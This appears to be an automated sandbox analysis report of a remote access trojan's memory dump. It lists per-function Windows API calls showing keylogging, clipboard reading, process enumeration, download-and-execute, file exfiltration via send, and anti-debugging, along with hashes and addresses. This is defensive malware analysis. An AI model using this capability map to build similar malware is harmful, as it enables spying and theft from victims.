GetKeyState.USER32(00000010), ref: 004094B8
GetKeyboardState.USER32(?), ref: 004094C5
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
Opcode Fuzzy Hash: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4

Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
Opcode Fuzzy Hash: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9

Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

Strings

`'G, xrefs: 00417C7E
`'G, xrefs: 00417DE4
H"G, xrefs: 00417BA1

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: H"G$`'G$`'G
API String ID: 341183262-2774397156
Opcode ID: 491aec702e058cc976c4f8e19fcf1970bdb99c150411e745d642373cd7af4ec7
Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
Opcode Fuzzy Hash: 491aec702e058cc976c4f8e19fcf1970bdb99c150411e745d642373cd7af4ec7
Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A

Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB

ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
GetProcAddress.KERNEL32(00000000), ref: 00414E72

Strings

PowrProf.dll, xrefs: 00414E66
SetSuspendState, xrefs: 00414E61

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
Opcode Fuzzy Hash: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE

Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3

Strings

ACP, xrefs: 0044F63A
OCP, xrefs: 0044F670

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398

Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE

Strings

SETTINGS, xrefs: 00419497

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19

Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004087A5
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
FindNextFileW.KERNEL32(00000000,?), ref: 00408846
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
Opcode Fuzzy Hash: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98

Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
IsValidCodePage.KERNEL32(00000000), ref: 0044F957
IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769

Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040784D
FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
__CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: e4819ccc166c9f01838b68987bff0171c3af6b43d70e485e5f2840cc2cf561bf
Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
Opcode Fuzzy Hash: e4819ccc166c9f01838b68987bff0171c3af6b43d70e485e5f2840cc2cf561bf
Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99

Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
CloseHandle.KERNEL32(00000000), ref: 0040E4EF

Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 1735047541-0
Opcode ID: 322a21650b7cdb691a380e1f32b584157382834de1627d8e80e9ce1f3e3b7542
Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
Opcode Fuzzy Hash: 322a21650b7cdb691a380e1f32b584157382834de1627d8e80e9ce1f3e3b7542
Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A

Function 004063C6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 0040651D, 00406645
open, xrefs: 004064CC

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
API String ID: 2825088817-2881483049
Opcode ID: 9af02d018f3fd44a8981843ad1b73823c729f3db09203ba27b131e3d49614b30
Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
Opcode Fuzzy Hash: 9af02d018f3fd44a8981843ad1b73823c729f3db09203ba27b131e3d49614b30
Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B

Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861

Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
Part of subcall function 0041215F: RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
Part of subcall function 0041215F: RegCloseKey.KERNELBASE(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1

Strings

Control Panel\Desktop, xrefs: 0041A7A7, 0041A7DA, 0041A82A
WallpaperStyle, xrefs: 0041A7AC, 0041A7DF, 0041A82F
TileWallpaper, xrefs: 0041A84B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: b2b5532adfee4e4b900b4fad0ed9cd8c83e1a92fc8b848bb2064ac0ba1e99bb2
Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
Opcode Fuzzy Hash: b2b5532adfee4e4b900b4fad0ed9cd8c83e1a92fc8b848bb2064ac0ba1e99bb2
Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF

Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
_wcschr.LIBVCRUNTIME ref: 0044F02A
_wcschr.LIBVCRUNTIME ref: 0044F038
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769

Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58

Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004399A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48

Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0044078B,?), ref: 004407D6
TerminateProcess.KERNEL32(00000000,?,0044078B,?), ref: 004407DD
ExitProcess.KERNEL32 ref: 004407EF

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040A65D
GetClipboardData.USER32(0000000D), ref: 0040A669
CloseClipboard.USER32 ref: 0040A671

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
Opcode Fuzzy Hash: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE

Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3

Strings

P@, xrefs: 004329DA

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID: P@
API String ID: 2325560087-676759640
Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5

Function 0044BA59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044BBEC

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94

Function 00445E1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F

Strings

GetLocaleInfoEx, xrefs: 00445E37

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
Opcode Fuzzy Hash: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D

Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: a7f074007be649f978420020ac925e3845266187a673ef2e5333e9e582309f19
Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
Opcode Fuzzy Hash: a7f074007be649f978420020ac925e3845266187a673ef2e5333e9e582309f19
Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A

Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59

